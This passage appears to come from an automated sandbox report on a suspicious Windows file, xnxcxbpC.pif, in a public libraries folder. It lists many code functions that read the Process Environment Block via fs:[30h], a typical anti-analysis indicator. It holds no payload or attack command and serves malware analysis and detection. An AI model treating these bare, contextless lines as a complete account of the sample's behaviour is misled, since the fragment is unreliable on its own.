                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1A118 mov eax, dword ptr fs:[00000030h]5_2_22B1A118
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]5_2_22B1E10E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B08158 mov eax, dword ptr fs:[00000030h]5_2_22B08158
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6C156 mov eax, dword ptr fs:[00000030h]5_2_22A6C156
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76154 mov eax, dword ptr fs:[00000030h]5_2_22A76154
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76154 mov eax, dword ptr fs:[00000030h]5_2_22A76154
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]5_2_22B04144
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]5_2_22B04144
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B04144 mov ecx, dword ptr fs:[00000030h]5_2_22B04144
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]5_2_22B04144
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]5_2_22B04144
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC6A6 mov eax, dword ptr fs:[00000030h]5_2_22AAC6A6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA66B0 mov eax, dword ptr fs:[00000030h]5_2_22AA66B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A74690 mov eax, dword ptr fs:[00000030h]5_2_22A74690
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A74690 mov eax, dword ptr fs:[00000030h]5_2_22A74690
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]5_2_22AEE6F2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]5_2_22AEE6F2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]5_2_22AEE6F2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]5_2_22AEE6F2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF06F1 mov eax, dword ptr fs:[00000030h]5_2_22AF06F1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF06F1 mov eax, dword ptr fs:[00000030h]5_2_22AF06F1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA6C7 mov ebx, dword ptr fs:[00000030h]5_2_22AAA6C7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA6C7 mov eax, dword ptr fs:[00000030h]5_2_22AAA6C7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA6620 mov eax, dword ptr fs:[00000030h]5_2_22AA6620
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA8620 mov eax, dword ptr fs:[00000030h]5_2_22AA8620
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7262C mov eax, dword ptr fs:[00000030h]5_2_22A7262C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E627 mov eax, dword ptr fs:[00000030h]5_2_22A8E627
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]5_2_22A8260B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]5_2_22A8260B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]5_2_22A8260B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]5_2_22A8260B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]5_2_22A8260B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]5_2_22A8260B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]5_2_22A8260B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE609 mov eax, dword ptr fs:[00000030h]5_2_22AEE609
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2619 mov eax, dword ptr fs:[00000030h]5_2_22AB2619
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA660 mov eax, dword ptr fs:[00000030h]5_2_22AAA660
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA660 mov eax, dword ptr fs:[00000030h]5_2_22AAA660
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3866E mov eax, dword ptr fs:[00000030h]5_2_22B3866E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3866E mov eax, dword ptr fs:[00000030h]5_2_22B3866E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA2674 mov eax, dword ptr fs:[00000030h]5_2_22AA2674
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8C640 mov eax, dword ptr fs:[00000030h]5_2_22A8C640
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A707AF mov eax, dword ptr fs:[00000030h]5_2_22A707AF
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B247A0 mov eax, dword ptr fs:[00000030h]5_2_22B247A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1678E mov eax, dword ptr fs:[00000030h]5_2_22B1678E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A927ED mov eax, dword ptr fs:[00000030h]5_2_22A927ED
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A927ED mov eax, dword ptr fs:[00000030h]5_2_22A927ED
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A927ED mov eax, dword ptr fs:[00000030h]5_2_22A927ED
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFE7E1 mov eax, dword ptr fs:[00000030h]5_2_22AFE7E1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A747FB mov eax, dword ptr fs:[00000030h]5_2_22A747FB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A747FB mov eax, dword ptr fs:[00000030h]5_2_22A747FB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7C7C0 mov eax, dword ptr fs:[00000030h]5_2_22A7C7C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF07C3 mov eax, dword ptr fs:[00000030h]5_2_22AF07C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC720 mov eax, dword ptr fs:[00000030h]5_2_22AAC720
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC720 mov eax, dword ptr fs:[00000030h]5_2_22AAC720
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA273C mov eax, dword ptr fs:[00000030h]5_2_22AA273C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA273C mov ecx, dword ptr fs:[00000030h]5_2_22AA273C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA273C mov eax, dword ptr fs:[00000030h]5_2_22AA273C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEC730 mov eax, dword ptr fs:[00000030h]5_2_22AEC730
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC700 mov eax, dword ptr fs:[00000030h]5_2_22AAC700
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70710 mov eax, dword ptr fs:[00000030h]5_2_22A70710
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA0710 mov eax, dword ptr fs:[00000030h]5_2_22AA0710
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78770 mov eax, dword ptr fs:[00000030h]5_2_22A78770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]5_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA674D mov esi, dword ptr fs:[00000030h]5_2_22AA674D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA674D mov eax, dword ptr fs:[00000030h]5_2_22AA674D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA674D mov eax, dword ptr fs:[00000030h]5_2_22AA674D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFE75D mov eax, dword ptr fs:[00000030h]5_2_22AFE75D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70750 mov eax, dword ptr fs:[00000030h]5_2_22A70750
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF4755 mov eax, dword ptr fs:[00000030h]5_2_22AF4755
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2750 mov eax, dword ptr fs:[00000030h]5_2_22AB2750
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2750 mov eax, dword ptr fs:[00000030h]5_2_22AB2750
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A764AB mov eax, dword ptr fs:[00000030h]5_2_22A764AB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA44B0 mov ecx, dword ptr fs:[00000030h]5_2_22AA44B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFA4B0 mov eax, dword ptr fs:[00000030h]5_2_22AFA4B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2A49A mov eax, dword ptr fs:[00000030h]5_2_22B2A49A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A704E5 mov ecx, dword ptr fs:[00000030h]5_2_22A704E5
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6C427 mov eax, dword ptr fs:[00000030h]5_2_22A6C427
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6E420 mov eax, dword ptr fs:[00000030h]5_2_22A6E420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6E420 mov eax, dword ptr fs:[00000030h]5_2_22A6E420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6E420 mov eax, dword ptr fs:[00000030h]5_2_22A6E420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]5_2_22AF6420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]5_2_22AF6420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]5_2_22AF6420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]5_2_22AF6420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]5_2_22AF6420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]5_2_22AF6420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]5_2_22AF6420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA430 mov eax, dword ptr fs:[00000030h]5_2_22AAA430
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA8402 mov eax, dword ptr fs:[00000030h]5_2_22AA8402
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA8402 mov eax, dword ptr fs:[00000030h]5_2_22AA8402
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA8402 mov eax, dword ptr fs:[00000030h]5_2_22AA8402
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFC460 mov ecx, dword ptr fs:[00000030h]5_2_22AFC460
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9A470 mov eax, dword ptr fs:[00000030h]5_2_22A9A470
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9A470 mov eax, dword ptr fs:[00000030h]5_2_22A9A470
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9A470 mov eax, dword ptr fs:[00000030h]5_2_22A9A470
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2A456 mov eax, dword ptr fs:[00000030h]5_2_22B2A456
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]5_2_22AAE443
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9245A mov eax, dword ptr fs:[00000030h]5_2_22A9245A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6645D mov eax, dword ptr fs:[00000030h]5_2_22A6645D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF05A7 mov eax, dword ptr fs:[00000030h]5_2_22AF05A7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF05A7 mov eax, dword ptr fs:[00000030h]5_2_22AF05A7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF05A7 mov eax, dword ptr fs:[00000030h]5_2_22AF05A7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A945B1 mov eax, dword ptr fs:[00000030h]5_2_22A945B1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A945B1 mov eax, dword ptr fs:[00000030h]5_2_22A945B1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA4588 mov eax, dword ptr fs:[00000030h]5_2_22AA4588
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A72582 mov eax, dword ptr fs:[00000030h]5_2_22A72582
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A72582 mov ecx, dword ptr fs:[00000030h]5_2_22A72582
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE59C mov eax, dword ptr fs:[00000030h]5_2_22AAE59C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A725E0 mov eax, dword ptr fs:[00000030h]5_2_22A725E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC5ED mov eax, dword ptr fs:[00000030h]5_2_22AAC5ED
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC5ED mov eax, dword ptr fs:[00000030h]5_2_22AAC5ED
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]5_2_22A9E5E7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE5CF mov eax, dword ptr fs:[00000030h]5_2_22AAE5CF
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE5CF mov eax, dword ptr fs:[00000030h]5_2_22AAE5CF
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A765D0 mov eax, dword ptr fs:[00000030h]5_2_22A765D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA5D0 mov eax, dword ptr fs:[00000030h]5_2_22AAA5D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA5D0 mov eax, dword ptr fs:[00000030h]5_2_22AAA5D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]5_2_22A9E53E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]5_2_22A9E53E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]5_2_22A9E53E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]5_2_22A9E53E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]5_2_22A9E53E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]5_2_22A80535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]5_2_22A80535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]5_2_22A80535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]5_2_22A80535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]5_2_22A80535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]5_2_22A80535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B06500 mov eax, dword ptr fs:[00000030h]5_2_22B06500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]5_2_22B44500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]5_2_22B44500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]5_2_22B44500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]5_2_22B44500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]5_2_22B44500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]5_2_22B44500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]5_2_22B44500
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA656A mov eax, dword ptr fs:[00000030h]5_2_22AA656A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA656A mov eax, dword ptr fs:[00000030h]5_2_22AA656A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA656A mov eax, dword ptr fs:[00000030h]5_2_22AA656A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78550 mov eax, dword ptr fs:[00000030h]5_2_22A78550
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78550 mov eax, dword ptr fs:[00000030h]5_2_22A78550
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78AA0 mov eax, dword ptr fs:[00000030h]5_2_22A78AA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78AA0 mov eax, dword ptr fs:[00000030h]5_2_22A78AA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AC6AA4 mov eax, dword ptr fs:[00000030h]5_2_22AC6AA4
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]5_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B44A80 mov eax, dword ptr fs:[00000030h]5_2_22B44A80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA8A90 mov edx, dword ptr fs:[00000030h]5_2_22AA8A90
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAAAEE mov eax, dword ptr fs:[00000030h]5_2_22AAAAEE
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAAAEE mov eax, dword ptr fs:[00000030h]5_2_22AAAAEE
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AC6ACC mov eax, dword ptr fs:[00000030h]5_2_22AC6ACC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AC6ACC mov eax, dword ptr fs:[00000030h]5_2_22AC6ACC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AC6ACC mov eax, dword ptr fs:[00000030h]5_2_22AC6ACC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70AD0 mov eax, dword ptr fs:[00000030h]5_2_22A70AD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA4AD0 mov eax, dword ptr fs:[00000030h]5_2_22AA4AD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA4AD0 mov eax, dword ptr fs:[00000030h]5_2_22AA4AD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9EA2E mov eax, dword ptr fs:[00000030h]5_2_22A9EA2E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AACA24 mov eax, dword ptr fs:[00000030h]5_2_22AACA24
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AACA38 mov eax, dword ptr fs:[00000030h]5_2_22AACA38
